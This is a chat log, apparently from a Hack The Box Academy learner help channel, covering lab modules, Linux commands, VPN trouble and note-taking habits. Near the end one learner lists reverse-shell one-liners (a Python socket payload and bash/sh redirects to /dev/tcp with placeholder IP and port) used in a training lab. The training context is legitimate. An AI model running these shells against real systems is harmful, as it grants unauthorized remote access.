#modules
For example, cross-site scripting likely won't allow you to read a file or run commands
I got in with basic creds.
KISS method baby
it's the getting started module, they won't have you do anything overly complex to get the answer
This is why I love talking to others while trying to solve it
it's CMS 3.3.15
PHP Version 7.4.3 - OK
cURL Module Installed - OK
GD Library Installed - OK
ZipArchive Installed - OK
SimpleXML Module Installed - OK
chmod chmod - OK
Apache Web Server Apache/2.4.41 (Ubuntu) - OK
Apache Mod Rewrite Installed - OK
I'm thinking about a reverse shell for the PHP maybe?
But I already have admin creds so idk
mm yes
seems potentially useful
How do I use an exploit I found on searchsploit
you can instead just do msfconsole -q then run a search in that
then you just use #
I have msfconsole open in another terminal already
I was planning to try to do an HTTP attack at first
why?
it's HTTP, not HTTPS
yes, but why
seemed to be an interesting way to attack as opposed to what I did
I don't know, it just struck me as the first possibility to attack
everything you need to know to attack this box was taught to you by the module
Which I did a month ago to be fair
knowledge checks and skill assessments rarely deviate from what was taught/shown to you
then you should be taking adequate notes
I don't take notes
I never was a note taker and I don't really know how to
basics of note taking:
- rewrite in your own words
- highlight/mark anything you may not know
- do additional research for clarity
- make sure that you understand your notes
copy/pasting is useless if you still don't understand it
Using a note-taking app like Obsidian, you can also put images/screenshots in it to further strengthen your notes with a clear example of what you did
It can also be important to take note of if/when you run into errors, what your error was and what it looks like,
and how you resolved it
You can use Notion or Obsidian, and there are tons of resources online on how to take notes for stuff like OSCP or cyber generally
but this is a field where not taking notes can have you spending hours looking for that one obscure Stack Overflow article about some guy named denvercoder49 having the same issue as you, with resolution.
consider your notes like a grimoire of knowledge.
as you use certain commands more often than others you'll get muscle memory for their syntax
I remember needing to look up the syntax a handful of times for xfreerdp /v:$TARGET /u:$TARGET-USER /p:$TARGET-PASSWORD /dynamic-resolution /drive:tools,/path/to/tools/ /cert-ignore
or python3 -c 'import pty; pty.spawn("/bin/bash")'
good notes will serve as a foundation for further learning as when you run into something later, you'll have something to refer to if you forgot what something is
as the tier 1 and 2 modules won't repeat the basic knowledge from tier 0
for instance these are the recommended modules to have a grasp of before doing the 'getting started' module
Hi, I am currently in the Learning Process module. I tried finding some resources about the ROQ (Relationship-Oriented Question) model to understand it better, but I failed to find any, as every search result, video or Google, does not give ROQ, as if it only exists in HTB. I hardly understand how to apply ROQ in everyday life without further examples than the one used on HTB, which talks about the methods we can use to access Windows remotely. Please help
I personally prefer drawing mind maps instead of writing notes because a picture is worth a thousand words and it also helps me visualize how I think about the concepts
The ROQ iirc was made by HTB as a questioning model, it's designed not to get you to the answer but to get you to the right questions... I too have trouble with it but it's just a model that you can alter and reframe to suit your own needs, you don't need to follow it by heart
Does someone else get these warnings also when executing cme?
use netexec
cme is no longer maintained, so there will only be more errors going forward
aw cool! I am going to use that one instead
Attacking Common Services - Medium
I have done the Nmap scan many times, but when I read the forum, I came to know port 30021 is running FTP. Can anyone tell me how I can know which port it is running on if I don't want to take forum help?
I hope someone got my point, what I am trying to say
Has anyone figured out how to make krbrelayx.py work on the current Pwnbox? It just always complains about getting the wrong auth type and never saves a TGT, no matter how it is installed, what version of Impacket you use, or even if you rm -rf your Python lib folder and reinstall it.
you scan all ports, in your screenshot you're running the most basic nmap scan with zero flags
I already have tried the flags but same result, I have sent it here for a clean look.
this once again isn't scanning all ports
u know scanning all ports takes 2 hours.
-p- is the flag to scan all ports
are u sure doing this is a good practice?
run it with -T5 or for even faster scanning --min-rate <N> where <N> is the number of minimum requests to send per second.
for the course and boxes, yes, for real life, not really
Hi, can I ask, are we supposed to follow along with the website instructions for the Information Security Foundations module, Setting Up section?
oh okay, thanks
I was confused, as when I opened the instance there were files I could not find, as shown on the website
Well the instance isn't gonna really have what's shown
As that's an in-browser vm
Already configured
understood, ty
What's this from?
Ok, please don't repost content from modules over Tier 0
Ask your question without the screenshot
I've already found the answer by looking at the structured logs on the screenshots. Yet, I don't know how to order my output to get the same answer
Sure, sorry. I didn't think about that
np
From Footprinting, Domain Information, DNS Records
I was running the DNS command but it was not working and couldn't query my DNS server, and it returned this:
```
dig any inlanefreight.com
;; Connection to 192.168.204.2#53(192.168.204.2) for inlanefreight.com failed: timed out.
;; no servers could be reached
```
Then I ran this and it showed:
```
dig any inlanefreight.com @ 8.8.8.8
; <<>> DiG 9.20.2-1-Debian <<>> any inlanefreight.com @ 8.8.8.8
...
;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248
...
inlanefreight.com. 300 IN SPF "v=spf1 include:_spf.google.com include:mail1.inlanefreight.com include:google.com ~all"
;; Query time: 184 msec
;; SERVER: 8.8.8.8#53(8.8.8.8) (TCP)
;; WHEN: Tue Dec 24 19:21:30 PKT 2024
;; MSG SIZE rcvd: 368
```
So the question is, am I missing out on any data if I'm doing it the second way? Is it ok to normalize using @ 8.8.8.8 every time I use a DNS command? I've confirmed from GPT it's fine but need second opinions.
What module and section are you working on?
If it's a private IP you use the IP as the @, i.e. dig axfr inlanefreight.htb @10.129.0.5
Otherwise it uses your default DNS configuration
Usually through your ISP
Also, you @'d a random person named changme when copy/pasting
But if it's a public website using any nameserver as the @ is fine
Ok i understand, thank you for your time.
From this it looks like it's just trying to query locally
If the tier of a module is not based on its difficulty, what is it based on?
I do think that the tier level classifies the difficulty. Why do you think that's not the case?
In the "intro to academy" module, it says that is not the case
Last sentence in the screenshot above
hi guys,
Has anyone experienced firewall issues in the MSSQL, Exchange, and SCCM Attacks (Introduction to SCCM) module?
Hey guys, I got an issue in this question. I don't know what the password is. I bypassed the filter but I don't know the password. I tried to hack it but there are no clients on it:
Execute the MAC Filtering bypass as demonstrated in the section to establish a connection to the 5 GHz band. Once connected, locate the flag at IP address 192.168.2.1.
btw why can I not send an image?
follow the instructions in #welcome
What could cause the error running Parrot here?
I can not identify myself!
and hello
Dm me
Have you searched for the error message at all?
Because I see lots of information out there
(I don't know how to solve this directly)
It said that it may be CPU storage issues
Did you find any articles that described this problem?
There are.. loads of links there
Literally Googling the error message
I can't say any of them will help, but I'm just saying.. there's quite a bit of info out there describing this issue, and potential solutions
Have you tried any of them?
Hello,
Is it normal that all machines are down for the Linux Privilege Escalation module (the Miscellaneous Techniques & Kernel Version part)? Impossible to maintain an SSH connection for more than 2 minutes. I've had this problem since yesterday. I tried with the online Pwnbox and also VPN from my PC.
You likely have more than one VPN connection open at the same time
Close any Pwnbox instances, and reboot your PC
Can anyone help me with my mistake?
It's hardly visible
I will send a better one

Now is it better?
what is the password
You're getting some timeout error, try taking the -c and the --kerberos flag out and see if it will work
Trying to find all installed packages on the target. The number is incorrect. I searched for dpkg.
Also have not figured out how to take screenshots on Parrot OS
I recall coming across a GitHub repository in one of the modules that contains benign Windows files useful for writing YARA rules. I checked the YARA & Sigma module but couldn't find the link. Does anyone else remember or know where to find it?
Same error... I don't understand, because I introduced everything in the section
Perhaps try to see if there's a flag to increase the time out
3.123 and 3.120 seconds, more or less the same
Module: AD Enumeration And Attacks
Section: DCSync
Am I the only one facing this issue? I reset the machines multiple times and changed the VPN server.
Hi everyone
can you ssh in?
I will just do this section via Windows machine
SSH also didn't work
I could run ligolo agent on windows machine also
Where can I add an image to the chat?
I got this error: Identification error: please contact an online Moderator or Administrator for help.
having an issue here
Then reach out to a mod [the people with shields next to their name]
how's this work? how do i have a 1 year mark a month ago but 2 year mark 9 hours ago?
apt list --installed | grep -iv listing | wc -l
Probably when they added them
ok how is that line any different than what I typed
Because .dpkg is if you're installing from source via dpkg
ok
I'm gonna go out on a limb and assume you chatGPTed it
No, I didn't.
The command i gave grabs the list of installed tools; cuts out a line which is unnecessary; then counts it
Any hacker here ??
I used to use Ubuntu 10 years ago so I assumed that would have been the file name
Any HACKER here ??
Again .dpkg is if installing via source
Not from repo
The fuck do you want; mind the #rules before you ask
I'm assisting someone with a linux basics issue
Yeah but why do you need a "hacker"?
If you want to start learning
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Are you hacker ?
I will go but can you tell me
Why does it matter
I am an Indian guy and I am new to Hackthebox, I want to be a hacker
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Read this link
Learn your basics.
Ok
Are you a pro hacker, how long did it take
Hey everyone, merry Xmas!
If someone has the time to help me out with
Attacking Common Services
Attacking Email Services
I am at the question
What is the available username for the domain inlanefreight.htb in the SMTP server?
I have tried using patator, hydra and smtp-user-enum with the users and pw given by HTB
I seem to not be able to find the user, can someone nudge me in the right direction?
apt list --installed | grep -iv listing | wc -l ok, so when I used grep -c | wc -l, no results. I am confused why you used -iv; when I looked up /man grep.... it did not list that as an option
-i and -v
Many commands you can combine the arguments
How can I hack a nearby wifi network, can anyone guide me
Like nmap -sS -sU -sV can be combined to -sSUV
ok so you don't separate, is there a limit on combinations
that is for all pipes
Depends on the command and arguments
Do this apt list --installed | head
And you'll see what you may or may not need to inverse grep (-v)
I didn't follow
There's an extra line you need to account for when counting the lines
but the answer was in the ___ range this only shows a few
Try adding the -w flag to smtp enum
...lead a horse to water
You don't pipe that to wc
I like you haha, got you
You pipe apt list --installed
Now you understand the need for the grep -iv [use man grep to figure out what those options do]
I will try this, ty
Yeah smtp is a slow service
Thank you for taking the time to break the line down. I not only want to understand what is being typed but why as well.
The modules have you engage in some critical thinking to solve them
man <command> and <command> --help are your biggest friends
Very much so. I am also doing this on a free account
¯\_(ツ)_/¯
Often if I'm asking why you're doing something a certain way, I'm challenging you to think why you did something (often wrong)
learning about /dev/null
And to ask the question "wait how do I <do thing>?"
always with find / ... 2> /dev/null 
Honestly it's a heavy load of new information in the Linux Fundamentals module,
it's what I need to learn Linux, but damn, how am I supposed to learn all that? It would take me a lot of time
yessir, we don't want stderr, don't want the permission denied, it would mess up our wc
Typically pipes only redirect stdout, not stderr without prodding
I take screenshots, re-write some stuff to memorise, like descriptions of directories in the filesystem hierarchy, Linux philosophy and its structure, architecture,
practice some stuff, but still, like, it takes time
Tbh I don't have deep notes of linux filesystem stuff
oh, good to know
Just what I typically need to know
I am in this mod right now
Such as
/dev/ < devices
/home/ < users
/root/ < magical wonderland
It's the first one I went to
Also remember, the only person that needs to understand your notes is you
So however you feel you need to organize is up to you
Abi
oh yes. plenty of notes.
Hi
Also a recommendation is to go back every now and then to readjust your notes
I.e. rerun a module you completed and readjust your notes
We're not gonna reverse a random b64 string from some nobody
It was deleted the first time, that should have been your hint that it doesn't belong here
will keep in mind
Hey marcielee Add me I'll send you something
Fuck off
Please bro
Only one
please dont drop strings into chat
and stop bothering them
No, I'm not deciphering some random string.
Come on
No means no. That's it
Ok bro
won't say it again.. stop bothering them
@plush lotus don't dm without asking
ok
I am not succeeding with this :/
How long are you telling it to __w__ait?
~25 seconds seems to be the most reliable
I did 5, I will try 25
Hi guys, wanted to ask whether the CBBH pathway covers some sort of Linux/Windows priv escalation, as to my knowledge 99% (if not 100%) of the boxes on HTB require some sort of privilege escalation. If CBBH doesn't cover this, then should we complete it and then go over to complete Linux/Windows priv escalation?
CBBH refers only to the website, not to the server. PrivEsc on the server is not an issue for CBBH
CBBH is about web exploits, not privesc/pentest
ok, just a bit confused because I remember asking whether the CBBH pathway was enough to complete boxes and people said it was, so I was wondering how people did the privilege escalation
yeah I know, but then that's not enough to complete the boxes?
It's enough to get your foot in the door and google fu the resy
Rest*
It may have been confused with CPTS, or perhaps only the web area of a box was meant
ahh I see
sadly still nothing
ok, I have a feeling I was supposed to do Networking Fundamentals prior to Linux.
Networking fundamentals is just networking 101 stuff
Keep in mind I do not work in IT. This is a self-motivated adventure. The only people I have as mentors are right here. I am starting from scratch here.
Networking 101 is stuff you can learn in 5 minutes on YouTube
Basics of private, public, and CIDR ranges
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
how do you explain this question
netstat is helpful
It's asking; how many services are listening [i.e. a web service], excluding IPv6 and localhost [127.0.0.x]
What is blowing my mind is that the lesson never once mentioned that. It talks about | more | less | head | tail | sort | grep | cut | tr | column | awk | sed | wc
Yeah some of the sections seem out of order
a little.
But this is pretty simple stuff tbh
netstat < network statistics
For basic commands try and have ways to memorize them
ls list stuff
mkdir make directory
I understand it is supposed to be simple, but how do I go about learning this without always asking for help? Should I skip a lesson to see if the next one leads to a hint, since it's out of order?
In 'Attacking Wi-Fi Protected Setup (WPS)' module --> 'Online PIN Brute-Forcing Using Reaver' section - the reaver bruteforcing should take some time?
"How do I do X in linux"
And asking for help isn't bad, it's how you ask for help that can be an issue.
If you're just asking for answers you're not learning anything
It's why giving vague but direct enough hints usually tips people in the right direction
Agreed, I don't want the answer. That is why I try to stay off Google.
Google isn't a boogeyman
hah
Again asking for help isn't a negative
We all start somewhere
A couple years ago I wouldn't have known wtf to do with an nmap scan
You're right, just don't want to be a pester
I would wager marcielee feels the same way I do, but I enjoy helping people who want to learn. The key is you need to put effort in, but if you do and you're just banging your head against the wall and need a nudge or explanation, you're not a pester at all. Just make sure you put in your effort.
If you don't wanna pester, discord has a handy search feature
It's why we push people to use module and section name
Your confusion on something is almost guaranteed to not be original
How do I go about using this feature
Ctrl-f on desktop. Magnifying glass icon on mobile
Perfect, I will use all resources. Thank you.
Did You solve this thing eventually?
When I run the Reaver bruteforce it gets stuck on the beacon part..
Guys, I desperately need your help, I have been fighting the "Intro to Academy's Purple Modules" for 5 hours now, and I can't figure it out:
Usage Example: Zabbix CVE-2024-22120
Academy says:
Let's navigate to the bottom of this section and click on 'Click here to spawn the target system!'. Then, let's SSH into the target IP using the provided credentials. The vast majority of the actions/commands covered from this point up to the end of this section can be replicated inside the target, offering a more comprehensive grasp of the topics presented.
But there are no credentials provided on the whole page.
should be at the bottom of the page where the questions are, if there are any questions
Try and refresh the page maybe...
Already done that, it's driving me crazy at this point
Damn
Like it says connect through SSH
But it just doesn't give me ANY credentials to SSH
Are there credentials supplied in the overview section?
:)
OK, to solve this - reset the target machine....
Overview as in the top?
Sometimes they'll drop credentials in the first sections
Just this
Overview as in first section
those are probably your creds
This looks like maybe windows
But could be linux
Ah those creds are for the web page
Tried, that's just the login credentials for zabbix, the web page
Try these creds?
No way, I read that part yesterday I fear the worst
not sure then, haven't done the module myself
Oh
LOL ur the best, I completely forgot that part
You're massively misunderstanding something
It's just a skill issue in this case, and trust me, I've been struggling for over 3 hours this time
Oh yea, I've already done that part haha
Thank you big time bro, you saved me a LOT of headache
Just as the current user, tried privesc but wasn't able to
I did sudo -l and it said I had vim permission NOPASSWD, but if I ran vim in the shell, it just timed me out
Yeah you need an interactive shell to use vim
But you shouldn't need to privesc afaik
I had no access to the root folder where the txt was located at tho
¯\_(ツ)_/¯
hi i'm struggling my way through the skills2 assessment on Attacking AD. I've managed to obtain a hash for mssqlsvc, but I cannot get a cleartext password. Looking at the solution I see that it's possible to get the cleartext password for this account. Am I missing something?
Determine what user the ProFTPd server is running under. Submit the username as the answer.
That's not to me, I think?
it's not
phew!
so guys, writing a command in the stdin doesn't work? gotta only provide files for stdin?
The first command is actually irrelevant; I wrote before it echo "test" > test.txt
I am still very stuck with this :/
aight go the EOF part
now I want to know: does stdin allow commands, or only files?
apparently it doesn't allow commands cuz bash is expecting a file or directory
https://www.gnu.org/software/bash/manual/html_node/Redirections.html 3.6.6 Here Documents
Single < is read file
cool, ty
hi guys
@ripe wadi there will be a spawn target button with the questions
Don't just paste the question from the section
You are meant to find the answer yourself, using the skills learned in the sections completed previously
yeah but the point is that I have to enum a domain
Yes
what does the target have to do with this
So, what did you learn about techniques on enumerating domains in the previous sections?
like use it as a nameserver >
Yes
Bingo
Critical thinking is required to be successful
they could have said it
It says target
That is not critical thinking, it's a random IP
We do accept feedback mind
They're assuming {{ braincell -gt 1}} 
I thought I had to SSH into it
How would you better present it?
Do the instructions say "ssh"?
Hi guys, I'm gonna do an HTB study sesh in a little while, and listen to some music. If anyone wants to join me, pls dm
it just says target
does this make sense to anyone?
If there's no explicit instruction to ssh/rdp/remote into a target, then it's not necessary
well instead of target say spawn nameserver
When given a target, think to what services you have been working on
..and learning about
That's gonna be difficult given how the backend works
@fathom pendant Determine what user the ProFTPd server is running under. Submit the username as the answer. How do I find the server?
It's a frontend change
just swap the text on a page
I believe netstat or some other tool can give info
Everything is simple when you are not the one making the change
ok anyway, thanks
ProFTPd is running on the target, don't overthink
Good luck!
As a dev, if you have to make a lot of changes to the codebase just to swap frontend text, it's not a good codebase
ps is good for processes
You're vastly underestimating the work required lmao
Again, everything is simple when you're not the one making the change
Yes, it should be simple
but it's not just the frontend work
addition of a DB field
populating all section questions
Not to mention change reviews and such
Most people don't have issues understanding target would == nameserver in this instance though
your frontend static button text is saved in a db?
just curious
What?
How it interacts with the backend is
the req is the same
I'm not going in to specifics of the codebase
Just.. please
I've been doing this for long enough
ok
Thank you for the suggestion
fair, thanks for the help again
Not necessarily, and without knowing the specifics of the codebase [as gob said] it's easy to go "just change this for this one specific instance"
I am struggling because I have yet to learn ps, netstat or any of the others that have been suggested. I am still in the Workflow section of Linux Fundamentals.
I found it! Been staring too long at it I guess, so made a mistake
someone has studied their modules in social engineering 
man ps
Look for "user"
Mood, the snmp stuff is similar, you're staring at it and think it's just an info message
They're saying they are
By getting you to talk about the codebase
I guess
¯\_(ツ)_/¯
bruh
I read your replies as broad things that need to happen for a module to be updated
¯\_(ツ)_/¯
ok so am I supposed to use locate with pipe ps
Why locate?
that's the module I am in
But why would you use locate to search for a substring
This is why I am confused in finding the answer. The past three lessons have had nothing but how to locate files
grep searches for substring within files/output
echo -E "foo\nbar" | grep "foo"
To extend ps [options] | grep -i proftpd
-i ignores case
It's useful if you're unsure how the output would format or if you're looking for multiple instances where the word may be case shifted
locate is useful for finding files [if they are cached for locate to pull]
I don't think I needed the password for that account to complete that assessment.
It does not define a user
No, I didn't need the password, was able to use the hash and progress
however the solution suggested the password was obtainable and I wondered if I had missed something
Idk, I don't have access to solutions, so I never worried about it.
I find it useful to check, as sometimes I did things differently to the solutions in the questions
I learn stuff from the solutions too
Yeah that makes sense and I'd do the same.
There's an option for ps to show u
__u__sers
guys is WEP still used?
isn't it replaced by WPA encryption?
I really hope not.. but no doubt there will be some out there
"if it works don't fix it"
WPA3: 28,562,179 (1.92%)
WPA2: 1,109,295,965 (74.66%)
WPA: 38,442,957 (2.59%)
WEP: 42,346,020 (2.85%)
????: 237,250,229 (15.97%)
None: 30,655,313 (2.06%)
42 Million is.. quite a lot
How many are still active, who knows
https://wigle.net/ this page has always been interesting to me, it shows a graph over time of encryption types for the uploaded stats.
thanks for the clarification
btw guys how can I use the VPN in HTB Academy
My current situation is
I have a config file I have downloaded from the page
use it with openvpn
and ran sudo openvpn --config ./academy-regular\(5\).ovpn
and after trying to reach the target IP
it says that it is down
Don't run the VPN and Pwnbox at the same time. Your command might work, idk. I just use openvpn <file> &
so to terminate my Pwnbox?
Your Pwnbox and the VPN share the same IP, so you can't run them at the same time without running into problems. One or the other.
Not sure, if it still doesn't work it's probably a good idea.
I had this issue as well. Delete all VPN downloads from HTB.
From my PC, or is there some panel on the website?
then run sudo openvpn ~/Downloads/academy-regular.ovpn
are you running linux?
then delete all files in the downloads file for HTB
sudo openvpn ~/Downloads/academy-regular.ovpn
@ripe wadi you can thank @fathom pendant for this resolve
Go to Hack The Box and download the VPN once
the issue is you can't run the pwnbox and vpn at the same time...
I stopped it
if you are using pwnbox, you don't use the VPN. it's already connected to the network
the VPN is for connecting to the HTB network on your own VM
if you can run a VM, i'd suggest doing that as the experience will be a lot easier. no reason other than preference or hardware limitations.
you don't have to create a VM, and it already has most tools you need. but you can always just make your own VM and install the tools you need
VM is the proper experience
what does that mean
and it's probably what you'd be doing when you're doing engagements
sed is a binary that lets you search for text based on a user-supplied regular expression (regex)
regexes are basically used to find/filter for specific characters or phrases within some string
Hey, I am struggling on the CDSA module 'Windows Attacks & Defense', section PKI - ESC1. From what I am reading, the lab assumes we already have access to the PKI machine because it starts off with a Windows screenshot using the Certify tool. I do not get any instruction from the lab on how to access the machine until a bit down the page:
```
Enter the password for eagle\htb-student:
Attempting to start powershell as user "eagle\htb-student" ...
```
This, again, is not a Kali-based command, so it does not work for me. I then go down a bit more towards the questions and get this information:
```
Please wait for 7-10 minutes after spawning the target of the below questions before requesting/generating any AD certificates!
For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.
```
So I do just that. I SSH into the machine using the given credentials in the questions at the bottom, with port forwarding. I successfully get into Kali. Awesome. Now here is the problem. I try to xfreerdp into the Windows machine and I get this error:
```
[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - failed to open display:
[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
```
I have tried to use 'export display=[local ip]:0.0' to help the issue. Still didn't work. I have tried xfreerdp into both the Kali and Windows machines. Didn't work. I have tried SSHing into both machines; I cannot do that due to the Windows machine not being pingable. Basically, I tried all sorts of combinations. I have been at this course for about 6 months and these are my final questions. If anyone can help me it would make my day. Thanks
do u guys recommend any video resources to help with for example Linux Fundamentals module or any?
I get this field requires a lot of research and that means reading text but still it's better whenever there's visual media
Reading the page, it looks like the target you spawn is a Kali box. If you can't RDP into it from your VM try the pwnbox. If you can't do that, you can still just setup something like chisel and proxychain your way into WS001 with xfreerdp.
https://www.youtube.com/watch?v=sWbUDq4S6Y8&themeRefresh=1 The best thing to do is just install Linux and use it. You didn't read a book on how to use Windows/Mac, so just explore. Also, LLMs like ChatGPT and Gemini help as well.
I have been using the pwnbox
I just spawned the target and tried from my VM and had no issues using SSH or RDP to get into the target
You SSH'd then RDP'd into it fine?
I SSH'd into the target. I can also xfreerdp into the target.
From within the Kali target you then RDP into WS001 according to the question
I just started typing xfreerdp into a terminal, and it autocompleted into exactly what was needed to remote in
so open a terminal on your target, then use xfreerdp to remote into ws001
lol
ok
I cannot paste any images for some reason, but it is giving me the same error
when I SSH and when I RDP into the Kali machine
So you RDP into Kali, from within that session you open the terminal and can't xfreerdp? You get the same error? I'd try another region or reach out to support on the website
So to clarify, I can get into the Kali target. It's the Windows target I am having trouble with
Can you do it from your end?
Maybe there's not enough clarity. You connect to the windows target from the Kali target
yes
And i take it what you're having issues with is connecting to the ws001 from the 10.129.x.x kali machine
I can get into the kali target but cannot get into the windows target from the kali target as directed
Yes!
Try these suggestions
i used a vm, not the pwnbox, could be the pwnbox needs some configuration but i doubt it
I have not used my own VM yet. I will try that
I think I have tried a different region in the past but I will try again jic
actually my bad
It isnt the same error when I rdp into both
wait what the hell... it worked.
THANKS!
yup good luck
unstable asl
Hey, did you end up finishing the skill assessment of malicious documents?
why is this the wrong answer
it says ipv4 only
"not on localhost & IPv4 only" shouldn't that mean ALL listening services? not just those?
yeah i guess so
i don't recall that question so i probably haven't done that module sorry
i can see it both ways with the way the question is worded
i did the command with the -4 for only IPv4, removed localhost with grep -v & worked
basically copy pasted command from google search actually
Ipv4 only, not localhost is the better phrasing
Avoid leaving answers in your screenshot
mb i was just tryina show the whole picture of what's going on,
i can't solve it
Do some light editing to block out
aight will do,
daaang should put the uniq before wc -l
That's smarter
still not working
so two things
why does uniq give different result than sort -u and why does neither of them work
well, i added 1 to the sort -u and somehow that's the answer..
Because you need to do a fair bit more filtering, and maybe regex (next section iirc)
I've linked a forum answer in the past that describes the commands used
Is there a module on memory scanning, manipulation etc...
The first is regarding forensics, the second regarding game hacking
They both have sections that cover memory, but of course forensics.. more on inspecting memory snapshots, game hacking, more on searching, structure and manipulation
Thanks a bunch
Not sure how embed works but I wonder if it'd be possible that instead of it showing the generic htb academy embed blurb, it can show the module linked
Possibly
There is the preview route
It could be possible to detect embed from Discord and rewrite to the public preview page
I agree, it's annoying
I wonder if it'd be better to get a copyable preview link button
I believe the preview uses the module name though
Here are some optional tasks to practice regex that can help us to handle it better and more efficiently. For all exercises, we will use the /etc/ssh/sshd_config file on our Pwnbox instance. why can i not cd to this file
Yeah it does indeed
Yeah they're optional exercises you can use the pwnbox instance for
Regex is useful to learn tbh
But I still use cheatsheets
i am trying to cd to ssh_config
Ssh_config is a file
It's under /etc/ssh directory
vm wont let me cd to the path
Btw you can specify full filepaths for pretty much any commands
won't let me
Useful error
i did use full path
Are you using the pwnbox or your own vm
pwnbox
What's the error you're getting
permission denied
You need to be root/use sudo
think i figured it out
why cant i get into the sshd_config i stopped it at ssh/
Because that is a file, not directory
As stated by the error
Just because it doesn't have a file extension doesn't mean it's a directory
haha ive been at this since 9 am think the wheel is turning and the hamster is dead
Okay I managed to solve the skill assessment of malicious documents, but I'm pretty sure not the intended way. If someone finds a proper solution let me know lol
I totally forgot how the WriteDACL II SA was fun!
You'll get different stuff each time you do it and in different ways!
Hello I need helo on Intro to White Box Pentesting can I DM anyone
AD Enumeration & Attacks - Skills Assessment Part II.
Can someone help me? What am I doing wrong?
ok so in REGex it only changes the color of the line of the syntax
why did you upload kerbrute instead of running it on the linux machine?
DomainPasswordSpray wouldve been the better choice there
Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Attack)
I wanted to know if I can get some assistance/hints on this part.
I am stuck at how to do directory traversal
Tbh I thought the attack wouldn't work from linux machine, because I had issues before too..Lemme try
I assume it is some kind of encoding. But not able to craft it well.
It worked from Linux machine...Why tho? Is it because I ran it via evil-winrm on the MS01??
not sure, just assumed it would work better on linux
It is important to note that execute permissions are necessary to traverse a directory not sure if that will help i just happen to be reading this.
ask in #challenges
to get access, verify your account -> #welcome
hey all, i'm currently revamping my notes as i go through the Pentesters Job Role. Question, I have the services in order from Footprinting and now i'm in the next module, Info Gathering- Web Edition and I'm curious to know if it makes sense to take the DNS & Subdomain notes I'd take from Info Gathering and incorporate them into the notes for DNS in footprinting, thoughts?
Or is this entire Info Gathering process done after you've completed footprinting during a pentest and not really related
Well, it's an extension of dns... in a way
kinda what i did, but with attacking common services
just added it to what i had
i am about to start Attacking Common Services once i complete fixing my notes up to Password Attacks
As I came close to completing PA, I realized my notes were complete shit, now they're kind of shit
Would you say Footprinting and Attacking Common services mesh together? I assume footprinting touches on the services a bit more than Getting Started and ACS dives way deeper?
I would suggest you to not organize your notes based on module names but services/techniques
that helps thank you, I am leaning that way but just tough to know for sure without knowing whats coming in the modules to come. I think I'll take the notes best I can from the modules and plan to consolidate as they dig deeper into a service or application. The order of things is what I'm trying to nail down for sure
I started doing it by module at first too, but whenever I want to consult my notes it is because I found a certain service running on a host and I want to know what I can try. So I see "ftp" and open my ftp notes to see everything, from anonymous login to bruteforcing to CVEs to things that I might've encountered in boxes
And then it doesn't matter what module taught me how to brute force ftp, I just know that that's an option for this service
Perfect thank you. Do you have everything in one long note or FTP in its own note, SMB in another, etc?
right now i have everything in one note (in obsidian) but i'm making sure to give everything the proper heading so i can expand sections as needed but still be able to do a "Find" within everything
I'm not sure about the perfect setup yet tbh. I used to have one more in obsidian that has each common port and what service is behind it and then linked to a separate note just for ftp
That works well for small services but once you reach AD there is so much to know about that alone that you'll likely need a few pages just for that
And over time the things I would write down in my notes become so "common knowledge" to me that I probably wouldn't write them down anymore today. For example I really don't need a brute force section on every service because I just know I can always try to brute force and what tools to use
ha yea i'm adding notes thinking "i'll probably not need this one eventually". I cant imagine how long the notes for active directory are going to be. Have you taken the CPTS yet? If yes, just curious how you knew you were ready
Hi everyone
Haven't taken it yet, but I'm pretty sure I'd pass it? It's mostly a time issue for me to find 10 days of "free" time. I'm happy to learn more and more though, already went through the advanced cert course
ah sorry to hear. though i'm a ways away, i cant imagine how i'm going to disappear for 10 days either lol
I've done other stuff like prolabs that are not so time constrained
Realistically if you consider both attempts you have 20 days which should be plenty of time for everything
agreed
Hello,
I'm doing the attacking tomcat module. I have my webshell that I want to transform into a reverse shell but I can't manage to find a proper command.
I used various from the shell & payloads course or from cheatsheet I found online based on sh & bash binaries and also I tried to use python. Nothing worked.
Example of payloads :
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- bash -i >& /dev/tcp/IP/PORT 0>&1
- sh -i >& /dev/tcp/IP/PORT 0>&1
IP & PORT were replaced by my IP & listening port.
It is blocked in some ways directly in the box or ? The authenticated RCE module from metasploit is also not working.
Sometimes "bash" is not enough and you need to provide "/bin/bash" instead
You can also try a few revshells from revshells.com
even with /bin/bash or /bin/sh it didn't work
it's what I did !
I used all bash related scripts and nothing worked
Or worst case download socat onto the machine and use that to establish a shell
yeah I think uploading socat or a payload is maybe the best option. Thank you I will try this !
hello ... Can anyone help me with the custom wordlists skill assessment (login bruteforcing)... There was nothing specific given in the question so I went with the creds given in the module itself, but it's taking forever.
Some googling and research may do you good to create custom wordlists
auh okie thanks
As noted by the custom wordlist section, which I'm assuming you're on
has anyone done the prolab zephyr and did your fping come up with more than one ip. Already stuck i feel dumb
#1263635449335910531 read and follow #welcome to access
Which version of Metasploit comes equipped with a GUI interface? (do i have to answer in version no. or the edition stuff) i am confused
Edition
got it thanks
i wasted way too much time for this answer omg
is this for me? lmao
nah man i tried every edition it was wrong due to space or some thing i was like wth????
Version != edition
Edition is like enterprise/professional/public
I believe it's also stated in that section
yes yes that's the one
Try the dummy data from the examples
I'm doing https://academy.hackthebox.com/module/254/section/2836 but after bypassing everything, I don't get the shell, can check for me?
https://hackmd.io/_uploads/SkVmzzYBkx.png
ayo that's what I've been doing π₯² still no results
Would you mind posting the module and section? Opening a link on mobile is a pain
it's intro to windows evasion techniques skill assessment 1
Okay
Didn't do that one yet
could anyone please help me with medium lab in attacking common services?
ahh shoot it was some error with my hydra thingy idk what happened when I routed my hydra requests through burp proxy it worked
where can I find the password for the zip file in Documentation & Reporting?
and why is it even protected with a password lol
pretty sure it's in the module
